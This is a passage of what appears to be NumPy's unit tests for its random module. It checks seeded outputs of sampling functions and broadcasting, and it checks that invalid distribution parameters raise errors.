s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(np.random.choice(6, s, replace=True).shape, s)
assert_equal(np.random.choice(6, s, replace=False).shape, s)
assert_equal(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(np.random.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, 1),
("b", np.int32, 1)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, np.random.mtrand.dirichlet, alpha)
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(np.random.exponential(scale=0), 0)
assert_raises(ValueError, np.random.exponential, scale=-0.)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(np.random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, np.random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(np.random.gumbel(scale=0), 0)
assert_raises(ValueError, np.random.gumbel, scale=-0.)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(np.random.laplace(scale=0), 0)
assert_raises(ValueError, np.random.laplace, scale=-0.)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(np.random.lognormal(sigma=0), 1)
assert_raises(ValueError, np.random.lognormal, sigma=-0.)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936 ],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning when check_valid='ignore'
assert_no_warnings(np.random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises a ValueError when check_valid='raise'
assert_raises(ValueError, np.random.multivariate_normal, mean, cov,
check_valid='raise')
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(np.random.normal(scale=0), 0)
assert_raises(ValueError, np.random.normal, scale=-0.)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(np.random.rayleigh(scale=0), 0)
assert_raises(ValueError, np.random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(np.random.standard_gamma(shape=0), 0)
assert_raises(ValueError, np.random.standard_gamma, shape=-0.)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
np.random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, np.random.uniform, throwing_float, throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
assert_equal(np.random.weibull(a=0), 0)
assert_raises(ValueError, np.random.weibull, a=-0.)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def setSeed(self):
np.random.seed(self.seed)
# TODO: Include test for randint once it can broadcast
# Can steal the test written in PR #6938
def test_uniform(self):
low = [0]
high = [1]
uniform = np.random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.setSeed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = np.random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.setSeed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.setSeed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = np.random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.setSeed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.setSeed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = np.random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = np.random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = np.random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.setSeed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.setSeed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = np.random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.setSeed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.setSeed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = np.random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.setSeed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.setSeed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = np.random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = np.random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.setSeed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = np.random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.setSeed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.setSeed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = np.random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.setSeed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = np.random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.setSeed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.setSeed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = np.random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.setSeed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = np.random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = np.random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = np.random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.setSeed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.setSeed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = np.random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.setSeed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.setSeed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = np.random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.setSeed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.setSeed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = np.random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.setSeed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
self.setSeed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = np.random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.setSeed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = np.random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.setSeed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
self.setSeed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = np.random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.setSeed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right)
self.setSeed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right)
self.setSeed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = np.random.binomial
desired = np.array([1, 1, 1])
self.setSeed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.setSeed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = np.random.negative_binomial
desired = np.array([1, 0, 1])
self.setSeed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
